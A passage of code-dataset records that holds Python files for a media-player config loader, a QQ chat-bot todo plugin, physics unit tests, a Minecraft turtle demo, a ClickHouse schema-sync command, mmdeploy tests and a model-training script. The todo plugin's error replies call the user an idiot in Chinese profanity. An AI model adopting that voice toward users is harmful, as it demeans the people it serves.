MyLogger.log(f'{platform.platform(True)} Python-{platform.python_version()}')\n self.raw: ConfigParser = self.update()\n self.fullscreen = self.raw.getboolean('emby', 'fullscreen', fallback=True)\n self.speed_limit = self.raw.getfloat('dev', 'speed_limit', fallback=0)\n self.debug_mode = self.raw.getboolean('dev', 'debug', fallback=False)\n self.disable_audio = self.raw.getboolean('dev', 'disable_audio', fallback=False) # test in vm\n self.gui_is_enable = self.raw.getboolean('gui', 'enable', fallback=False)\n self.cache_path = self.raw.get('gui', 'cache_path', fallback=None)\n self.cache_db = self._get_cache_db()\n self.sys_proxy = self._get_sys_proxy()\n self.dl_proxy = self._get_proxy('download')\n self.script_proxy = self._get_proxy('script')\n self.player_proxy = self._get_proxy('player')\n if self.debug_mode:\n print('dl_proxy:', self.dl_proxy)\n print('cache_db:', self.cache_db)\n\n def ini_str_split(self, section, option, fallback=''):\n ini = self.raw.get(section, option, fallback=fallback).replace(',', ',')\n ini = [i.strip() for i in ini.split(',') if i.strip()]\n return ini\n\n def _get_cache_db(self):\n _cache_db = os.path.join(self.cache_path, '.embyToLocalPlayer.json') if self.cache_path else None\n _dev_cache_db = os.path.join(self.cwd, 'z_cache.json')\n return _dev_cache_db if os.path.exists(_dev_cache_db) else _cache_db\n\n def _get_sys_proxy(self):\n if not self.raw.getboolean('dev', 'use_system_proxy', fallback=True):\n return\n import urllib.request\n proxy = 
urllib.request.getproxies().get('http')\n if not proxy:\n return\n print(f'system proxy: {proxy}')\n proxy = proxy.split('://')\n proxy = proxy[1] if len(proxy) == 2 else proxy[0]\n return proxy\n\n def _get_proxy(self, for_what):\n if self.sys_proxy:\n return self.sys_proxy\n p_map = dict(download=['gui', 'http_poxy', ''],\n script=['dev', 'script_proxy', ''],\n player=['dev', 'player_proxy', ''])\n *args, fallback = p_map[for_what]\n proxy = self.raw.get(*args, fallback=fallback)\n if 'socks' in proxy.lower():\n raise ValueError('only support http proxy')\n proxy = proxy.split('://')\n proxy = proxy[1] if len(proxy) == 2 else proxy[0]\n return proxy\n\n def update(self):\n config = ConfigParser()\n config.read(self.path, encoding='utf-8-sig')\n self.raw = config\n self.fullscreen = self.raw.getboolean('emby', 'fullscreen', fallback=True)\n self.debug_mode = self.raw.getboolean('dev', 'debug', fallback=False)\n self.disable_audio = self.raw.getboolean('dev', 'disable_audio', fallback=False) # test in vm\n self.gui_is_enable = self.raw.getboolean('gui', 'enable', fallback=False)\n self.sys_proxy = self._get_sys_proxy()\n self.dl_proxy = self._get_proxy('download')\n self.script_proxy = self._get_proxy('script')\n self.player_proxy = self._get_proxy('player')\n return config\n\n def check_str_match(self, _str, section, option, return_value=False, log=True):\n ini_list = self.ini_str_split(section, option, fallback='')\n match_list = [i for i in ini_list if i in _str]\n if ini_list and any(match_list):\n result = match_list[0] if return_value else True\n else:\n result = False\n _log = {True: \"match\", False: \"not match\"}[bool(result)]\n if log:\n _log = f'{_str} {_log}: {section}[{option}] {ini_list}'\n if MyLogger.need_mix:\n _log = MyLogger.mix_args_str(_log)\n MyLogger.log(_log)\n return result\n\n\nconfigs = Configs()\n","repo_name":"kjtsune/embyToLocalPlayer","sub_path":"utils/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":7496,"program_lang":"python","lang":"en","doc_type":"code","stars":234,"dataset":"github-code","pt":"53"} +{"seq_id":"39401068849","text":"import json, os\r\nfrom functools import cmp_to_key\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nfrom plugins.identify import id_func, SU\r\nimport time\r\n\r\nlong_term = [] # {name=\"\", done=T/F}\r\nshort_term = [] # {name=\"\", parts=ini, part_name=\"\", to_part=\"\", time=\"\"}\r\ndir_path = os.getcwd() + '/data/todo/'\r\n\r\ndef init():\r\n global long_term, short_term\r\n if not os.path.exists(dir_path):\r\n os.makedirs(dir_path)\r\n \r\n try:\r\n with open(dir_path + 'long_term.json', 'r', encoding = 'utf-8') as f:\r\n long_term = json.load(f)\r\n except FileNotFoundError:\r\n with open(dir_path + 'long_term.json', 'w', encoding = 'utf-8') as f:\r\n json.dump(long_term, f)\r\n\r\n try:\r\n with open(dir_path + 'short_term.json', 'r', encoding = 'utf-8') as f:\r\n short_term = json.load(f)\r\n except FileNotFoundError:\r\n with open(dir_path + 'short_term.json', 'w', encoding = 'utf-8') as f:\r\n json.dump(short_term, f)\r\n\r\n print('[+] todo组件初始化成功')\r\n\r\ninit()\r\n\r\ndef write_json():\r\n with open(dir_path + 'long_term.json', 'w', encoding = 'utf-8') as f:\r\n json.dump(long_term, f)\r\n with open(dir_path + 'short_term.json', 'w', encoding = 'utf-8') as f:\r\n json.dump(short_term, f)\r\n \r\ndef short_cmp(t1, t2):\r\n if t1['done'] != t2['done']:\r\n if t1['done'] == True:\r\n return 1\r\n else:\r\n return -1\r\n return len(t1['name']) - len(t2['name'])\r\n\r\ndef long_cmp(t1, 
t2):\r\n return -t1['to_part']/t1['parts'] + t2['to_part']/t2['parts']\r\n\r\ndef once_modify():\r\n short_term.sort(key = cmp_to_key(short_cmp))\r\n long_term.sort(key = cmp_to_key(long_cmp))\r\n write_json()\r\n if os.path.exists(dir_path + 'todo.png'):\r\n os.remove(dir_path + 'todo.png')\r\n\r\ndef get_font(id, size):\r\n FONTS_PATH = 'src/fonts'\r\n if id == 'wh':\r\n return ImageFont.truetype(os.path.join(FONTS_PATH, '汉仪文黑.ttf'), size)\r\n if id == 'num':\r\n return ImageFont.truetype(os.path.join(FONTS_PATH, 'JetBrainsMono-ExtraBold-6.ttf'), size)\r\n\r\nwhite = (0xff, 0xff, 0xff, 0xff)\r\nblack = (0x00, 0x00, 0x00, 0xff)\r\ngray = (0xe0, 0xe0, 0xe0, 0xff)\r\ndark_blue = (0x0f, 0x1f, 0x3f, 0xff)\r\n\r\ndef draw_short(id, T):\r\n width = 800\r\n height = 100\r\n\r\n # 先画左边那个小框框\r\n check = Image.open(os.getcwd() + '/src/check.png')\r\n check = check.resize((75, 70))\r\n check_box = Image.new('RGBA', (75, 70), (0xdf, 0xdf, 0xdf, 0xff))\r\n draw_check = ImageDraw.Draw(check_box)\r\n # draw.rectangle((15, 15, 90, 85), fill=(0xbf, 0xbf, 0xbf, 0xff))\r\n draw_check.text((5, 2), str(id).zfill(2), fill=dark_blue, font=get_font('num', 55))\r\n check = Image.blend(check, Image.new(\"RGBA\", (75, 70), (0, 0, 0, 0)), 0.2)\r\n if T['done']:\r\n check_box.paste(check, (0, 0), mask=check)\r\n\r\n # 再画大框框和字\r\n img = Image.new('RGBA', (width, height), white)\r\n draw = ImageDraw.Draw(img)\r\n draw.text((120, 16), str(T['name']), fill=black, font=get_font('wh', 60))\r\n img.paste(check_box, (15, 15))\r\n # img.save(img_path)\r\n return img\r\n\r\n\r\ndef draw_long(id, T):\r\n width = 800\r\n height = 160\r\n img = Image.new('RGBA', (width, height), white)\r\n draw = ImageDraw.Draw(img)\r\n\r\n # id的小框\r\n x0, y0 = 20, 90\r\n w0, h0 = 140, 50\r\n id = \"{0:#0{1}x}\".format(id,4)\r\n draw.rectangle((x0, y0, x0 + w0, y0 + h0), fill = gray)\r\n draw.text((x0 + 10, y0), id, fill = dark_blue, font = get_font('wh', 45))\r\n\r\n # name\r\n x1, y1 = 20, 20\r\n w1, h1 = 600, 60\r\n draw.rectangle((x1, y1, x1 + w1, y1 + h1), fill = gray)\r\n text = T['name']\r\n draw.text((x1 + 10, y1 + 8), text, fill = black, font=get_font('wh', 40))\r\n\r\n # part name\r\n x2, y2 = 170, 90\r\n w2, h2 = x1 + w1 - x2, 50\r\n draw.rectangle((x2, y2, x2 + w2, y2 + h2), fill = (0xef, 0xef, 0xef, 0xff))\r\n draw.text((x2 + 10, y2 + 5), '事项进度:' + T['part_name'], fill = black, font=get_font('wh', 20))\r\n # time\r\n x3, y3 = x2, y2 + 20\r\n draw.text((x3 + 10, y3 + 5), '上次更新:' + T['time'], fill = black, font=get_font('wh', 20))\r\n\r\n # 圈圈\r\n x4, y4 = 720, 80\r\n r4 = 70\r\n draw.ellipse((x4 - r4, y4 - r4, x4 + r4, y4 + r4), fill = None, outline = (0xa0, 0xa0, 0xa0, 0xff), width = 35)\r\n start = -90\r\n end = -90 + 360 * T['to_part'] / T['parts']\r\n draw.arc((x4 - r4, y4 - r4, x4 + r4, y4 + r4), fill = (0x00, 0xff, 0x00, 0xff), start = start, end = end, width = 35)\r\n \r\n\r\n # 进度字样\r\n x4, y4 = x2 + 330, y3 + 5\r\n draw.text((x4, y4), '进度:' + str(T['to_part']).zfill(2) + '/' + str(T['parts']).zfill(2), fill = black, font = get_font('wh', 20))\r\n return img\r\n\r\ndef draw_todo():\r\n img_path = dir_path + '/todo.png'\r\n\r\n if os.path.exists(img_path):\r\n return img_path\r\n\r\n height = 104 * len(short_term) + 164 * len(long_term) + 280\r\n width = 960\r\n img = Image.new('RGBA', (width, height), gray)\r\n draw = ImageDraw.Draw(img)\r\n draw.text((300, 20), '短期事项', fill = dark_blue, font = get_font('wh', 80))\r\n px = 80\r\n py = 120\r\n idx = 0\r\n for i in short_term:\r\n img.paste(draw_short(idx, i), (px, py))\r\n idx 
= idx + 1\r\n py = py + 102\r\n\r\n py = py + 30\r\n draw.text((300, py), '长期事项', fill = dark_blue, font = get_font('wh', 80))\r\n py = py + 100\r\n idx = 0\r\n for i in long_term:\r\n img.paste(draw_long(idx, i), (px, py))\r\n idx = idx + 1\r\n py = py + 164\r\n img.save(img_path)\r\n return img_path\r\n\r\nasync def show_todo(event, bot):\r\n print('[+] 触发show_todo')\r\n await bot.send(event, f'[CQ:image,file=files:///{draw_todo()}]')\r\n\r\ndef get_time_str():\r\n return time.strftime(\"%Y/%m/%d %H:%M\", time.localtime())\r\n\r\nasync def add_todo(T, event, bot):\r\n print('[+] 触发add_todo')\r\n T = T.replace(\"'\", '\"')\r\n try:\r\n T = json.loads(T)\r\n except json.decoder.JSONDecodeError:\r\n await bot.send(event, '格式错了,改一改再试试呢')\r\n return\r\n \r\n if not 'type' in T:\r\n await bot.send(event, '缺少事件类型,改一下再试试呢')\r\n return\r\n if not 'name' in T:\r\n await bot.send(event, '缺少事件名,改一下再试试呢')\r\n return\r\n \r\n if T['type'] == 'short':\r\n short_term.append({'name': T['name'], 'done': False})\r\n once_modify()\r\n await bot.send(event, '添加成功')\r\n await show_todo(event, bot)\r\n return\r\n elif T['type'] == 'long':\r\n if not 'parts' in T or type(T['parts']) != int:\r\n await bot.send(event, '总进度参数错误')\r\n return\r\n if 'part' in T and type(T['part']) == int and 'pname' in T:\r\n to_part = T['part']\r\n part_name = T['pname']\r\n else:\r\n to_part = 0\r\n part_name = 'None'\r\n time_str = get_time_str()\r\n long_term.append({\r\n 'name': T['name'],\r\n 'parts': T['parts'],\r\n 'to_part': to_part,\r\n 'part_name': part_name,\r\n 'time': time_str\r\n })\r\n once_modify()\r\n await bot.send(event, '添加成功')\r\n await show_todo(event, bot)\r\n return\r\n else:\r\n await bot.send(event, 'type参数错误')\r\n return\r\n\r\nasync def done_todo(T, event, bot):\r\n print('[+] 触发done_todo')\r\n if T.isdigit():\r\n T = int(T)\r\n if T < len(short_term):\r\n short_term[T]['done'] = True\r\n once_modify()\r\n await bot.send(event, '记下了!')\r\n return\r\n else:\r\n await bot.send(event, 'IndexError!!!你个傻逼!')\r\n return\r\n else:\r\n T = T.replace(\"'\", '\"')\r\n try:\r\n T = json.loads(T)\r\n except json.decoder.JSONDecodeError:\r\n await bot.send(event, '格式错了,改一改再试试呢')\r\n return\r\n if 'id' in T and 'part' in T and 'pname' in T:\r\n time_str = get_time_str()\r\n id = int(T['id'], base = 16)\r\n if id < len(long_term):\r\n long_term[id]['time'] = time_str\r\n long_term[id]['to_part'] = T['part']\r\n long_term[id]['part_name'] = T['pname']\r\n once_modify()\r\n await bot.send(event, '记下了')\r\n return\r\n else:\r\n await bot.send(event, 'IndexError!!!你个傻逼!')\r\n return\r\n else:\r\n await bot.send(event, '缺参数了!')\r\n return\r\n\r\n\r\n \r\nasync def del_todo(id, event, bot):\r\n print('[+] 触发del_todo')\r\n if id[:2] == '0x':\r\n try:\r\n id = int(id, base=16)\r\n except ValueError:\r\n await bot.send(event, 'ValueError!!!你个傻逼!')\r\n return\r\n else:\r\n if id < len(long_term):\r\n long_term.pop(id)\r\n once_modify()\r\n await bot.send(event, '删除成功了喔')\r\n return\r\n else:\r\n await bot.send(event, 'IndexError!!!你个傻逼!')\r\n return\r\n else:\r\n try:\r\n id = int(id)\r\n except ValueError:\r\n await bot.send(event, 'ValueError!!!你个傻逼!')\r\n return\r\n else:\r\n if id < len(short_term):\r\n short_term.pop(id)\r\n once_modify()\r\n await bot.send(event, '删除成功了喵')\r\n return\r\n else:\r\n await bot.send(event, 'IndexError!!!你个傻逼!')\r\n return\r\n\r\nhelp_msg = '感兴趣的可以看看\\nhttps://github.com/PrssHH/ttBot#todo%E6%8F%92%E4%BB%B6'\r\n\r\nasync def todo(event, bot):\r\n msg = str(event.message)\r\n if msg[:5] != 
'-todo':\r\n return False\r\n\r\n if not id_func(event, 'todo'):\r\n return True\r\n \r\n if msg == '-todo':\r\n await show_todo(event, bot)\r\n return True\r\n \r\n if not event.user_id in SU:\r\n await bot.send(event, 'QAQ 只有华华可以改自己的todolist...')\r\n return True\r\n \r\n msg = msg[6:]\r\n if msg[:3] == 'add':\r\n await add_todo(msg[4:], event, bot)\r\n elif msg[:4] == 'done':\r\n await done_todo(msg[5:], event, bot)\r\n elif msg[:3] == 'del':\r\n await del_todo(msg[4:], event, bot)\r\n elif msg == 'help':\r\n print('[+] 触发todo_help')\r\n await bot.send(event, help_msg)\r\n else:\r\n await bot.send(event, '指令错了喵')\r\n return True\r\n","repo_name":"ush11o/ttBot","sub_path":"plugins/todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":10600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29524685429","text":"import numpy as np\nimport utils\nimport boosts\nimport pytest\n\nD_MASS_GEV = 1.86484\nK_MASS_GEV = 0.493677\nPI_MASS_GEV = 0.139570\n\n\ndef test_array_to_array():\n N = 10\n\n # oOoOo random numbers in a unit test OoOooo\n target = np.random.random((4, N))\n\n assert np.allclose(target, boosts._to_arrays(target, N))\n\n\ndef test_particle_to_array():\n N = 3\n\n target = [1, 2, 3, 4]\n expected = np.array([[1, 1, 1], [2, 2, 2], [3, 3, 3], [4, 4, 4]])\n\n assert np.allclose(expected, boosts._to_arrays(target, N))\n\n target = np.array([1, 2, 3, 4])\n assert np.allclose(expected, boosts._to_arrays(target, N))\n\n\ndef test_to_array_bad_shape():\n N = 3\n with pytest.raises(ValueError):\n boosts._to_arrays([1, 2, 3], N)\n\n with pytest.raises(ValueError):\n boosts._to_arrays([1, 2, 3, 4, 5], N)\n\n with pytest.raises(ValueError):\n boosts._to_arrays(np.random.random((3, N)), N)\n\n with pytest.raises(ValueError):\n boosts._to_arrays(np.random.random((5, N)), N)\n\n\ndef test_beta():\n assert utils._velocity(5.0 / 3.0) == 0.8\n\n\ndef test_magnitude():\n assert utils._magnitude(np.array([2.0, 7.0, 26.0])) == 27.0\n\n\ndef test_direction():\n assert np.allclose(\n utils.direction(np.array([2.0, 7.0, 26.0])),\n np.array([2.0 / 27.0, 7.0 / 27.0, 26.0 / 27.0]),\n )\n\n\ndef test_mass():\n assert utils._masses(27.0, 2.0, 7.0, 26.0) == 0.0\n\n\ndef test_masses():\n energies = np.array([27.0, 28.0, 10.0, 15.0])\n px = np.array([2.0, 2.0, 1.0, 2.0])\n py = np.array([7.0, 7.0, -2.0, 0.0])\n pz = np.array([26.0, 26.0, 3.0, 4.0])\n\n assert np.allclose(\n utils._masses(energies, px, py, pz),\n np.array([0.0, np.sqrt(55), np.sqrt(86), np.sqrt(205)]),\n )\n\n\ndef test_multiply():\n assert np.allclose(\n utils._multiply(np.array([1, 2]), np.array([[1, 2, 3], [4, 5, 6]])),\n np.array([[1, 2, 3], [8, 10, 12]]),\n )\n\n\ndef test_no_boost():\n # Stationary D\n d_momentum = np.array([0.0, 0.0, 0.0, D_MASS_GEV])\n\n gamma = utils.gamma(D_MASS_GEV, d_momentum[3])\n dirn = d_momentum[:3]\n\n # vector to boost\n target = np.array([1, 2, 3, 4])\n\n # Check that it's unaffected\n assert np.all(utils.boost(target, gamma, dirn) == target)\n\n\ndef test_x_boost():\n \"\"\"\n Boost along the x axis\n\n \"\"\"\n d_3momentum = [5.0, 0.0, 0.0]\n d_energy = np.sqrt(np.linalg.norm(d_3momentum) ** 2 + D_MASS_GEV ** 2)\n d_4momentum = np.array([*d_3momentum, d_energy])\n\n k_3momentum = [0.0, 3.0, -4.0]\n k_energy = np.sqrt(np.linalg.norm(k_3momentum) ** 2 + K_MASS_GEV ** 2)\n k_4momentum = np.array([*k_3momentum, k_energy])\n\n gamma = utils.gamma(D_MASS_GEV, d_energy)\n dirn = np.array([1.0, 0.0, 0.0])\n\n expected = np.array([-13.47280853, 
3.0, -4.0, 14.37916154])\n\n    assert np.allclose(expected, utils.boost(k_4momentum, gamma, dirn), atol=0.01)\n\n\ndef test_general_boost():\n    \"\"\"\n    Boost along a not-nice direction\n\n    \"\"\"\n    d_3momentum = np.array([1.0, 2.0, 3.0])\n    d_energy = np.sqrt(np.linalg.norm(d_3momentum) ** 2 + D_MASS_GEV ** 2)\n    d_4momentum = np.array([*d_3momentum, d_energy])\n\n    k_3momentum = [1.0, 3.0, -4.0]\n    k_energy = np.sqrt(np.linalg.norm(k_3momentum) ** 2 + K_MASS_GEV ** 2)\n    k_4momentum = np.array([*k_3momentum, k_energy])\n\n    gamma = utils.gamma(D_MASS_GEV, d_energy)\n    dirn = utils.direction(d_3momentum)\n\n    expected = np.array([-2.190947286, -3.381894571, -13.57284186, 14.16697618])\n\n    assert np.allclose(expected, utils.boost(k_4momentum, gamma, dirn), atol=0.01)\n","repo_name":"richard-lane/lorentz-boost","sub_path":"lorentz-boost/test/test_ut.py","file_name":"test_ut.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21814637084","text":"from mcpi.minecraft import Minecraft #Importing MCPI, which is necessary for MCpen\nimport time #Yet another import (not that important)\nfrom MCpen.mcturtle import MCTurtle, direction #Imports imports imports. (This one is important because it actually imports the MCpen library)\n#Please note: when you do [pip install MCpen], you do not need to include the MCpen before the [mcturtle]. This is for the convenience of those who cannot use the pip install method.\nimport random\n#More unnecessary imports\n\nmc = Minecraft.create(\"localhost\") #This initializes the connection to a server, in this case it is 'local host', meaning that the server is local on your computer.\nplayerId = mc.getPlayerEntityId(\"GnarlyLlama\") #This gets the Player ID, which contains all sorts of information, such as the player's position.\n# Note: if you wish to use your own player ID, please replace the current user name with your user name.\npos = mc.entity.getPos(playerId) # We get the position of the player we appointed to earlier.\npx = pos.x # Get the X coordinate of the player's position\npy = pos.y # Get the Y coordinate of the player's position\npz = pos.z # Get the Z coordinate of the player's position\nt = MCTurtle(mc, px, py-1, pz) # This actually initializes and creates the turtle, in this case under the player's feet.\ntime.sleep(3) # Sleep 3 seconds so we have time to switch over and see what is going on\n\n# SET UP STUFF\n#---------------------------------------------\n# ACTUAL STUFF\n\nt.updateStroke(159) # We update the stroke to 159, which is white_hardened_clay. This makes the pen draw that block when it is moved around.\nt.forward(15) # We move the pen forward 15 blocks\ntime.sleep(1) # We wait 1 second\nt.turn(direction.UP) # Turn the pen UP\ntime.sleep(1) # Wait another second\nt.forward(10) # Move the pen forward 10 blocks (In this case it moves up because the pen is pointing upwards. Think of yourself as the pen. 
When you turn up, going forward means going in that direction)\ntime.sleep(1)\nt.turn(direction.DOWN) # We turn the pen back down\ntime.sleep(1)\nt.home() # And finally, we go to the original place where the turtle came from.\n","repo_name":"LemonFoxmere/MCturtle","sub_path":"demos/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39511296979","text":"import logging\nimport re\nfrom collections import defaultdict\nfrom typing import Dict, Set\n\nimport structlog\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom posthog.clickhouse.schema import CREATE_TABLE_QUERIES, get_table_name\nfrom posthog.client import sync_execute\nfrom posthog.cloud_utils import is_cloud\n\nlogger = structlog.get_logger(__name__)\nlogger.setLevel(logging.INFO)\n\nTableName = str\nQuery = str\nHostName = str\n\n\nclass Command(BaseCommand):\n help = \"Synchronize schema across clickhouse cluster, creating missing tables on new nodes\"\n\n def add_arguments(self, parser):\n parser.add_argument(\n \"--dry-run\",\n action=\"store_true\",\n help=\"Exits with a non-zero status if schema changes would be required.\",\n )\n\n def handle(self, *args, **options):\n if is_cloud():\n logger.info(\"✅ Skipping sync_replicated_schema because is_cloud=true\")\n return\n\n _, create_table_queries, out_of_sync_hosts = self.analyze_cluster_tables()\n\n if len(out_of_sync_hosts) > 0:\n logger.info(\n \"Schema out of sync on some clickhouse nodes!\",\n out_of_sync_hosts=out_of_sync_hosts,\n )\n\n if options.get(\"dry_run\"):\n exit(1)\n else:\n self.create_missing_tables(out_of_sync_hosts, create_table_queries)\n\n logger.info(\"✅ All ClickHouse nodes schema in sync\")\n\n def analyze_cluster_tables(self):\n table_names = list(map(get_table_name, CREATE_TABLE_QUERIES))\n rows = sync_execute(\n \"\"\"\n SELECT hostName() as host, name, create_table_query\n FROM clusterAllReplicas(%(cluster)s, system, tables)\n WHERE database = %(database)s\n AND name IN %(table_names)s\n \"\"\",\n {\n \"cluster\": settings.CLICKHOUSE_CLUSTER,\n \"database\": settings.CLICKHOUSE_DATABASE,\n \"table_names\": table_names,\n },\n )\n\n host_tables: Dict[HostName, Set[TableName]] = defaultdict(set)\n create_table_queries: Dict[TableName, Query] = {}\n\n for host, table_name, create_table_query in rows:\n host_tables[host].add(table_name)\n create_table_queries[table_name] = create_table_query\n\n return host_tables, create_table_queries, self.get_out_of_sync_hosts(host_tables)\n\n def get_out_of_sync_hosts(self, host_tables: Dict[HostName, Set[TableName]]) -> Dict[HostName, Set[TableName]]:\n table_names = list(map(get_table_name, CREATE_TABLE_QUERIES))\n out_of_sync = {}\n\n for host, tables in host_tables.items():\n missing_tables = set(table_names) - tables\n if len(missing_tables) > 0:\n out_of_sync[host] = missing_tables\n\n return out_of_sync\n\n def create_missing_tables(\n self,\n out_of_sync_hosts: Dict[HostName, Set[TableName]],\n create_table_queries: Dict[TableName, Query],\n ):\n missing_tables = set(table for tables in out_of_sync_hosts.values() for table in tables)\n\n logger.info(\"Creating missing tables\", missing_tables=missing_tables)\n for table in missing_tables:\n query = create_table_queries[table]\n sync_execute(self.run_on_cluster(query))\n\n def run_on_cluster(self, create_table_query: Query) -> Query:\n return re.sub(\n r\"^CREATE TABLE (\\S+)\",\n 
f\"CREATE TABLE IF NOT EXISTS \\\\1 ON CLUSTER '{settings.CLICKHOUSE_CLUSTER}'\",\n create_table_query,\n count=1,\n )\n","repo_name":"PostHog/posthog","sub_path":"posthog/management/commands/sync_replicated_schema.py","file_name":"sync_replicated_schema.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"13921109091","text":"import os\nfrom tempfile import NamedTemporaryFile, TemporaryDirectory\n\nimport numpy as np\nimport pytest\nimport torch\nfrom mmengine import Config\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.dataset import Dataset\n\nimport mmdeploy.apis.onnxruntime as ort_apis\nfrom mmdeploy.apis import build_task_processor\nfrom mmdeploy.codebase import import_codebase\nfrom mmdeploy.core.rewriters.rewriter_manager import RewriterContext\nfrom mmdeploy.utils import Codebase, load_config\nfrom mmdeploy.utils.test import DummyModel, SwitchBackendWrapper, WrapFunction\n\ntry:\n import_codebase(Codebase.MMAGIC)\nexcept ImportError:\n pytest.skip(\n f'{Codebase.MMAGIC} is not installed.', allow_module_level=True)\n\nmodel_cfg = 'tests/test_codebase/test_mmagic/data/model.py'\nmodel_cfg = load_config(model_cfg)[0]\ndeploy_cfg = Config(\n dict(\n backend_config=dict(type='onnxruntime'),\n codebase_config=dict(type='mmagic', task='SuperResolution'),\n onnx_config=dict(\n type='onnx',\n export_params=True,\n keep_initializers_as_inputs=False,\n opset_version=11,\n input_shape=None,\n input_names=['input'],\n output_names=['output'])))\ninput_img = np.random.rand(32, 32, 3)\nimg_shape = [32, 32]\ninput = {'img': input_img}\nonnx_file = NamedTemporaryFile(suffix='.onnx').name\ntask_processor = None\n\n\n@pytest.fixture(autouse=True)\ndef init_task_processor():\n global task_processor\n task_processor = build_task_processor(model_cfg, deploy_cfg, 'cpu')\n\n\n@pytest.fixture\ndef backend_model():\n from mmdeploy.backend.onnxruntime import ORTWrapper\n ort_apis.__dict__.update({'ORTWrapper': ORTWrapper})\n wrapper = SwitchBackendWrapper(ORTWrapper)\n wrapper.set(outputs={\n 'output': torch.rand(1, 3, 50, 50),\n })\n\n yield task_processor.build_backend_model([''])\n\n wrapper.recover()\n\n\ndef test_build_test_runner():\n # Prepare dummy model\n from mmagic.structures import DataSample\n\n img_meta = dict(ori_img_shape=(32, 32, 3))\n img = torch.rand(3, 32, 32)\n data_sample = DataSample(gt_img=img, metainfo=img_meta)\n data_sample.set_data(\n dict(output=DataSample(pred_img=img, metainfo=img_meta)))\n data_sample.set_data(dict(input=img))\n outputs = [data_sample]\n model = DummyModel(outputs=outputs)\n assert model is not None\n # Run test\n with TemporaryDirectory() as dir:\n runner = task_processor.build_test_runner(model, dir)\n wrapped_func = WrapFunction(runner.test)\n\n with RewriterContext({}):\n _ = wrapped_func()\n\n\ndef test_build_pytorch_model():\n from mmagic.models import BaseEditModel\n model = task_processor.build_pytorch_model(None)\n assert isinstance(model, BaseEditModel)\n\n\ndef test_build_backend_model(backend_model):\n assert backend_model is not None\n\n\ndef test_create_input():\n inputs = task_processor.create_input(input_img, input_shape=img_shape)\n assert inputs is not None\n\n\ndef test_visualize(backend_model):\n input_dict, _ = task_processor.create_input(input_img, img_shape)\n\n with torch.no_grad():\n results = backend_model.test_step(input_dict)[0]\n\n with TemporaryDirectory() as dir:\n filename = dir + 'tmp.jpg'\n 
task_processor.visualize(input_img, results, filename, 'window')\n assert os.path.exists(filename)\n\n\ndef test_get_tensor_from_input():\n assert type(task_processor.get_tensor_from_input(input)) is not dict\n\n\ndef test_get_partition_cfg():\n with pytest.raises(NotImplementedError):\n task_processor.get_partition_cfg(None)\n\n\ndef test_build_dataset_and_dataloader():\n data = dict(\n type='BasicImageDataset',\n ann_file='test_ann.txt',\n metainfo=dict(dataset_type='div2k', task_name='sisr'),\n data_root='tests/test_codebase/test_mmagic/data',\n data_prefix=dict(img='imgs', gt='imgs'),\n pipeline=[\n dict(\n type='LoadImageFromFile',\n key='img',\n color_type='color',\n channel_order='rgb',\n imdecode_backend='cv2'),\n ])\n dataset = task_processor.build_dataset(dataset_cfg=data)\n assert isinstance(dataset, Dataset), 'Failed to build dataset'\n dataloader_cfg = dict(\n num_workers=4,\n persistent_workers=False,\n drop_last=False,\n sampler=dict(type='DefaultSampler', shuffle=False),\n dataset=data)\n dataloader = task_processor.build_dataloader(dataloader_cfg)\n assert isinstance(dataloader, DataLoader), 'Failed to build dataloader'\n","repo_name":"open-mmlab/mmdeploy","sub_path":"tests/test_codebase/test_mmagic/test_super_resolution.py","file_name":"test_super_resolution.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"}
{"seq_id":"75297133928","text":"import os, pickle\nimport pandas as pd\nimport datetime\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_curve, roc_auc_score\nfrom sklearn.model_selection import StratifiedKFold\nfrom tqdm import tqdm\n\nimport config\nfrom utils import setup_logger, ModelFactory\n\ndef train(X_train, y_train, model_config, logger):\n model = ModelFactory(config.MODEL_NAME, model_config, logger)\n model.fit(X_train, y_train)\n\n return model\n\ndef valid(model, X_test, y_test):\n pred = model.predict(X_test)[:, 1]\n auc_score = roc_auc_score(y_test, pred)\n return auc_score\n\nif __name__ == '__main__':\n NOW = datetime.datetime.now().strftime('%Y-%m-%d_%H:%M:%S')\n logger = setup_logger('./logs/train_{0}.log'.format(NOW))\n #Being able to load this as a dataframe is convenient in various ways.\n df = pd.read_pickle(os.path.join(config.SAVE_PATH, 'application_train.pickle'))\n logger.info('train_df shape: {0}'.format(df.shape))\n X = df[[col for col in df.columns if col not in config.unused]]\n y = df.TARGET\n\n scores = []\n kfold = StratifiedKFold(n_splits=5, shuffle=True, random_state=42)\n\n logger.info('Start Kfold validation')\n #By its nature, a stratified split also requires y to be specified.\n for i, (train_idx, test_idx) in enumerate(tqdm(kfold.split(X, y))):\n model = train(X.iloc[train_idx], y.iloc[train_idx], config.MODEL_CONFIG, logger)\n auc_score = valid(model, X.iloc[test_idx], y.iloc[test_idx])\n scores.append(auc_score)\n logger.info('Iteration number: {}, AUC Score: {}'.format(i, auc_score))\n #X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=config.TEST_SIZE, random_state=config.SEED)\n score_avg = sum(scores)/5\n\n #model = train(X_train, y_train, config.MODEL_CONFIG, logger)\n #auc_score = valid(model, X_test, y_test)\n logger.info('Average AUC Score: {0}'.format(score_avg))\n logger.info('Save Model to directory {0}'.format(config.SAVE_PATH))\n\n pickle.dump(model, open(os.path.join(config.SAVE_PATH, config.MODEL_FILE), 
